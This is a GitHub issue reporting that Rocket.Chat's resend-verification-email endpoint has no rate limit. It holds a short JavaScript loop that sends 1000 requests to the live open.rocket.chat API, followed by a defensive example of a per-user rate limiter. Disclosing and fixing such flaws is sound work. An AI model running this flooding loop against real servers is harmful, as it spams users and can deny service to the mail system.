Resend Verification Email Can Be Abused to Spam Mail Server #35965

JASIM0021 opened this issue May 11, 2025 · 4 comments · May be fixed by #35971
Comments

@JASIM0021

JASIM0021 commented May 11, 2025

Description:

The "Resend Verification Email" feature on the Rocket.Chat profile page can be exploited to send an unlimited number of verification emails in a short period of time. By copying the network request triggered by the "Resend" button and programmatically executing it in a loop (e.g., 1000 times), the server sends a verification email for each request without any rate limiting or throttling in place. This can result in email spam and potentially overload the mail server, leading to degraded performance or service disruption.

Steps to reproduce:

  1. Navigate to: https://open.rocket.chat/account/profile

  2. Below the email input, there's a "Resend Verification Email" button.

  3. Click the button 3–4 times — you’ll receive the same number of verification emails.

  4. Open your browser’s Network tab, and copy the fetch or cURL request for the resend action.

  5. Using the browser console (or any script environment), run the same request in a loop (e.g., 1000 times).

Example:

function sendMail () {
  fetch("https://open.rocket.chat/api/v1/users.sendConfirmationEmail", {
    "headers": {
      "accept": "application/json",
      "accept-language": "en-US,en;q=0.9",
      "content-type": "application/json",
      "priority": "u=1, i",
      "sec-ch-ua": "\"Chromium\";v=\"136\", \"Google Chrome\";v=\"136\", \"Not.A/Brand\";v=\"99\"",
      "sec-ch-ua-mobile": "?0",
      "sec-ch-ua-platform": "\"macOS\"",
      "sec-fetch-dest": "empty",
      "sec-fetch-mode": "cors",
      "sec-fetch-site": "same-origin",
      "x-auth-token": "<your-auth-token>",
      "x-user-id": "<user-user-id>"
    },
    "referrer": "https://open.rocket.chat/account/profile",
    "referrerPolicy": "same-origin",
    "body": "{\"email\":\"<your-email>\"}",
    "method": "POST",
    "mode": "cors",
    "credentials": "include"
  }).then((data)=>data.json()).then((data)=>console.log(data,"data"))
}

let count = 0;
while (count < 1000) {
  sendMail();
  count++;
}

Expected behavior:

  • The server should throttle or rate-limit resend email requests.

Ideally, add protections like:

  • Minimum cooldown period (e.g., 3 emails per X minutes)

  • CAPTCHA after repeated requests

  • Backend rate limiting and abuse prevention

Actual behavior:

The server sends a separate email for every request, even if they are triggered in rapid succession.

There are no rate limits, cooldowns, or CAPTCHA to prevent abuse.

This allows an attacker to flood the mail server, potentially causing performance degradation or a denial-of-service condition.

Server Setup Information:

  • Version of Rocket.Chat Server:
  • License Type:
  • Number of Users:
  • Operating System:
  • Deployment Method:
  • Number of Running Instances:
  • DB Replicaset Oplog:
  • NodeJS Version:
  • MongoDB Version:

Client Setup Information

Additional context

Relevant logs:
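What the protections requested above look like in code, as an added example that is not part of this issue and not Rocket.Chat's own code: a per-user sliding-window limiter for a "resend verification email" handler, with a short cooldown between sends, a cap per window, and a 429 plus Retry-After for rejected calls. The limits (3 per 10 minutes, 30 seconds between sends), the function names, the simulated handler and the fake clock are all assumptions made for the illustration; the only thing taken from the report is that the endpoint is authenticated per user.

```javascript
// Added example, not Rocket.Chat code: a per-user limiter for a
// "resend verification email" endpoint, with a short cooldown between
// sends and a cap per sliding window. All names, limits and the
// simulated handler below are assumptions made for this illustration.

const MAX_PER_WINDOW = 3;            // assumed: at most 3 emails ...
const WINDOW_MS = 10 * 60 * 1000;    // ... per 10-minute sliding window
const MIN_GAP_MS = 30 * 1000;        // assumed: at least 30 s between two sends

// Sliding-window limiter. `now` is injectable so the behaviour can be
// exercised without waiting on the wall clock.
function createResendLimiter({ max = MAX_PER_WINDOW, windowMs = WINDOW_MS,
                               minGapMs = MIN_GAP_MS, now = Date.now } = {}) {
  const history = new Map(); // key -> timestamps (ms) of recent allowed sends

  function check(key) {
    const t = now();
    // Drop timestamps that have aged out of the window.
    const recent = (history.get(key) || []).filter((ts) => t - ts < windowMs);
    history.set(key, recent);

    const last = recent[recent.length - 1];
    if (last !== undefined && t - last < minGapMs) {
      return { allowed: false, reason: 'cooldown', retryAfterMs: minGapMs - (t - last) };
    }
    if (recent.length >= max) {
      return { allowed: false, reason: 'window', retryAfterMs: windowMs - (t - recent[0]) };
    }
    recent.push(t); // a send is counted only when it is allowed
    return { allowed: true, remaining: max - recent.length };
  }

  return { check };
}

// Simulated request handler. The key is the authenticated user id (the
// endpoint already requires x-auth-token / x-user-id), so changing the
// address in the body does not reset the budget. Over-limit calls get a
// 429 with Retry-After and never reach the mail transport.
function handleSendConfirmation(limiter, { userId, email }, sendEmail) {
  if (!userId) {
    return { status: 401, body: { success: false, error: 'unauthorized' } };
  }
  const decision = limiter.check(`resend:${userId}`);
  if (!decision.allowed) {
    return {
      status: 429,
      headers: { 'Retry-After': String(Math.ceil(decision.retryAfterMs / 1000)) },
      body: { success: false, error: `too many requests (${decision.reason})` },
    };
  }
  sendEmail(email); // only now does a message reach the mail server
  return { status: 200, body: { success: true, remaining: decision.remaining } };
}

// Replays a burst like the one in the report against the guarded handler,
// with a constructed clock advanced by `stepMs` between requests. Returns
// how many requests produced an email and how many were rejected.
function simulateBurst(requests, stepMs = 0) {
  let clock = 1000000; // constructed starting time, ms
  const limiter = createResendLimiter({ now: () => clock });
  const outbox = [];   // constructed stand-in for the mail transport
  let sent = 0;
  let rejected = 0;
  for (let i = 0; i < requests; i++) {
    const res = handleSendConfirmation(
      limiter, { userId: 'user-1', email: 'user@example.test' }, (to) => outbox.push(to));
    if (res.status === 200) sent++; else rejected++;
    clock += stepMs;
  }
  return { sent, rejected, delivered: outbox.length };
}

console.log('1000 requests at once:', simulateBurst(1000));        // 1 sent, 999 rejected
console.log('10 requests, 31 s apart:', simulateBurst(10, 31000));  // 3 sent, 7 rejected
```

Keying on the user id rather than the request body is the point that matters for this endpoint: the report's loop is authenticated, so a limiter that keys on the target address alone would be reset by changing the address. In a multi-instance deployment the `Map` would need to live in shared storage (Redis or the database) so that all instances see the same counts; an in-memory map protects only the instance that holds it.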

@reetp

reetp commented May 11, 2025

Nice!

Referred to team.

A PR might be good ;-)

@ABHYUDAYATIWARI

The same issue is on the first-time register page.

@TrilokShetty

Hello,
Is this issue fixed? If not, please reply; I will be happy to help.

@JASIM0021

> Hello, is this issue fixed? If not, please reply; I will be happy to help.

Actually, one PR has already been made to fix this issue, but if you'd like, you can still explore the codebase and the issue yourself. Feel free to review the code if you wish.
